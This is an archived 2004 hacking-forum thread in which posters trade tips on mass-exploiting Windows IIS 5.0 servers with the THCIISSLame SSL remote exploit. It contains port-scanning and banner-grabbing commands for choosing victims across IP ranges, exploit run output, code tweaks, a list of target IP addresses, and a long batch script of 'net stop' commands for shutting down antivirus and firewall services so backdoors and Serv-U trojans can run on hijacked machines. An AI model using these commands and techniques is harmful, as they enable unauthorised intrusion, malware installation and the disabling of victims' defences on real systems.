hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Iis5 Ssl V0.2
Pages: 1, 2, 3, 4, 5
michael
seems that the main problem now is that people cant connect to serv-u once they started it

any with anwsers here on what to do ??
eXist
Well I'm guessing the system has a firewall installed on there and/or there is an IP filter active. Make sure you have actually started it.
If you really want to you could find out what AV software is running and kill it so you can start your all important server.
phoney
Which CBPort is the best to forward routers ?
michael
QUOTE (rvd @ Apr 24 2004, 05:39 PM)
Haven't got any shells this far, maybe i have just badluck or am i doing something wrong. I'll tell you what i did:

- I compiled the code with dev c++ with the mod of Ecko thank you for that.
- I made a little autohacker in .bat file, not anything special.
- Then i started scanning with a modified version of sfind, i scanned on port 443 at a german range.
- After the scanning i did a banner scan from at the results of the port scan, (did it with Scanline: command sl -bhpt 80 -f input.txt -o output.txt
- Filtered the banner scan and toke every ip where the banner scan said: Microsoft-IIS/5.0
- Then i put the ip's in a txt file and executed the autohacker.



How did u filter that banner scan...u got a prog for it ?
Meteor
For all that can't start servu, or any trojan or anything else did you stop all AV? cause i see "Network Associates McShield" in the list of service name of realloader!
I manage to star tojan or backdoor without any problem!
michael
how did u manage that....i'd like to know wink.gif
Meteor
just stop AV and start the app you want, i don't understand what is the problem!
net stop "AV service name"
blabla.exe
in the shell!
tte
QUOTE (Meteor @ Apr 25 2004, 10:56 AM)
just stop AV and start the app you want, i don't understand what is the problem!
net stop "AV service name"
blabla.exe
in the shell!

you got a list of AV Services names?
arn0ld
tte there u go just make a .bat out of it :
(just searched in the forum)

CODE

net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
Meteor
simply by typing "net start" and u will see all service in the remote machine that has been started
Silent Bob
oh dear, idiots come on think about it, (oh yeah when you make that bat some AVs will call it a virus anyway)
thanks for the code gunna give it a test smile.gif
ind0r
when i get shell after about 60 seconds I get disconnect. could anyone help?
'net user' didn't work, I get error with rpc.
jpno5
bloody n00bs, use the new perl script
Meteor
yes the new perl script might be good but doesn't work for me ^^
if "net user" don't work... nothing with net command can be done i think, so try an another ip
DarkAngel52457
Than give us the link to the new perl exploit then i have a lot of things test it an not can connect to serv-u sad.gif

guufa
QUOTE
C:\SSL-IIS>Lame.exe 141.213.165.249 82.64.177.135 3245

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] modded version by Ecko --> greetz to FireBlade, XeroX [*])

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
bind error() 10048


With Your Auto Haxor Gui G777, I have this error without netcat opened.
Problem or bad target ?
Ecko
yo guufa...you NEED NETCAT...without out it wouldn't work...the bind error is the reason
DarkAngel52457
this tool works fine i have many shells you ignore the button nc

the prob is you upload your serv-u an start this than you will connect whit flashfxp and you can not conect

guufa
With Netcat or without netcat its the same : bind error.

How can I make ?
porc1978
QUOTE (guufa @ Apr 25 2004, 01:47 PM)
With Netcat or without netcat its the same : bind error.

How can I make ?

I've got the same problem but only with nc opened ( the port is 3245)...anyone has idea about it?
Meteor
you don't need netcat if netcat listen on port 444 and you choose 444 for bind port, it cause a bind error in the sploit
Ecko
hm...i've got also NO problems with it...I use old ntpw servers and store their netcat on port 1199...i controll them via telnet...no probs
michael
thx to all of u i got this 1 figured out rolleyes.gif
mucho gracias
saendler
@g777 nice gui method...thx a lot....
mighty_falcon
hmmm has this exploit worked for anyone yet? like getting a real shell on the remote computer?

i have tried it a few times but i get timed out, could not attack server sad.gif
Qlimax
i try 2 hack with the autohacker of G777 big list and everybody is:
CODE

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
[*] Warte auf ankommende shell
[*] Server couldn't be attacked - Timeout!
mighty_falcon
QUOTE (Qlimax @ Apr 25 2004, 05:18 PM)
i try 2 hack with the autohacker of G777 big list and everybody is:
CODE

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
[*] Warte auf ankommende shell
[*] Server couldn't be attacked - Timeout!

yep, im getting the same sad.gif think almost everyone is patched by now
Krogoth
the chances of getting a shell is like 1 out of 500.
i'm using both ver 0.1 and 0.2. all i can say is, most are firewalled or patched if you don't get any shell.

g777: thanks for the nice gui smile.gif
i'll experiment it when i have free time.
HAnzsz
w0000t

getting shells 1 outta 5 biggrin.gif

just bannerscan your port 443 results on english ranges
"microsoft iis 5.0"

it PWnz
thx biggrin.gif
Ecko
but with which tool you scan for banners??plz share
fre4k
Hi...

do the banerscan with scanline.

http://www.foundstone.com/resources/termso...e.zip&warn=true


or just do a port scan (443) and check the results with xscan v.3.1 and the msiis nasl script...


so long

greetings

fre4k
totof
there is scanline.exe
mighty_falcon
sorry for this noobish question but everytime i use scanline to check ips from a list with the following command

QUOTE
sl -b 443 -f scan.txt




it just scans my local network blink.gif

any ideas on what im doing wrong?

tnx
Ecko
it didn't work too to me...i don't know why it nothing found...
Unio
CODE
sorry for this noobish question but everytime i use scanline to check ips from a list with the following command


QUOTE  
sl -b 443 -f scan.txt






it just scans my local network  

any ideas on what im doing wrong?

tnx


try

CODE
sl -bhpt 443 -f scan.txt

arn0ld
wink.gif
sl -bhpt 80 -f ips.txt -o results.txt
totof
sl -bhpt 80,443 -f ips.txt -o results.txt
mighty_falcon
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

sad.gif same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to listed differentely?

tnx
dmg
QUOTE (mighty_falcon @ Apr 25 2004, 08:09 PM)
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

sad.gif same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to listed differentely?

tnx

The first two ip addresses have 5 octets..... What do you think blink.gif
mighty_falcon
QUOTE (dmg @ Apr 25 2004, 09:42 PM)
QUOTE (mighty_falcon @ Apr 25 2004, 08:09 PM)
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

sad.gif same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to listed differentely?

tnx

The first two ip addresses have 5 octets..... What do you think blink.gif

lol no that was just an egsample m8 tongue.gif

the real list is smth like this

QUOTE

128.3.1.72
128.3.2.48
128.3.90.1
128.3.95.1
128.4.10.245
128.4.22.61
128.4.40.10
128.4.50.10
128.4.51.10
HAnzsz
foolish mortals,

you people should study a thing or two about hardware routers !

if you dont understand what this ip means 192.168.*
then you should give up this " local " scriptkiddying b/c you're just too shitlame for this.

a tip for thos who are trying so hard and cant do it by their selves
"ipconfig" in DOS

check for ip
is it network ip?
is it software routed ip?
is it inet direct axxable ip ?

allrighty lets get to w0rk ! biggrin.gif
touk
QUOTE (Ecko @ Apr 24 2004, 03:51 PM)
@dEuS

only search in the source code for:

CODE

printf("[*] waiting for shell\n");


put the following code 1 line under that!

CODE

Sleep(6000);
printf("[*] exploit didn't w0rk - timeout!\n\n");
printf("[*][*][*] modded by Ecko [*][*][*]\n");
exit(-1);

Lol ! It cant work smile.gif With a sleep(6000) you will ALWAYS get printf("[*] exploit didn't w0rk - timeout!\n\n");

If u want to do something like this u have to intiate a process who will look at the motherprocess and who will kill it after some milliseconds of inactivity.
Lanig
what i did to prevent timeout is simply removed the part where it creates a listening socket and just jump to send the shellcode and printf waiting for shell for a couple of seconds
in the meantime i have another netcat window that gets the shell... more useful for autohacking
Ecko
thats right you will always get the "timeout". But it musn't be a timeout if it work you should get a shell! just watch your netcat smile.gif
onurize
bind_error sad.gif help me plZ!
polpotx
I've tryed to compiled this myself ... but i got this errot:

QUOTE
(18) : fatal error C1083: Cannot open include file: 'winsock2.h': No such file or directory


I am using Microsoft Visual C++ Toolkit . Can someone advice me about this ? Why The compiled didn;t find the winsock2.h ? Where can i get it from ?

Best regards
Ecko
@onurize

means you netcat doesn't work!

@polpotx

you should compile it with visual c++ enterprise (get it with kazaa wink.gif ) (i dit it too successfully complie with it)

hope could hel

ppeaz
onurize
@ ecko but it must work i use the autohaxor with netcat... sad.gif but i scan 1000 Ips no shell sad.gif

can you help me plz ? over ICQ or Email or somethink ?
Ecko
ok onurize pmed you
jak3c
very good exploit...!
thanks you for sharing your code ...
i will test it if i have some time !
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.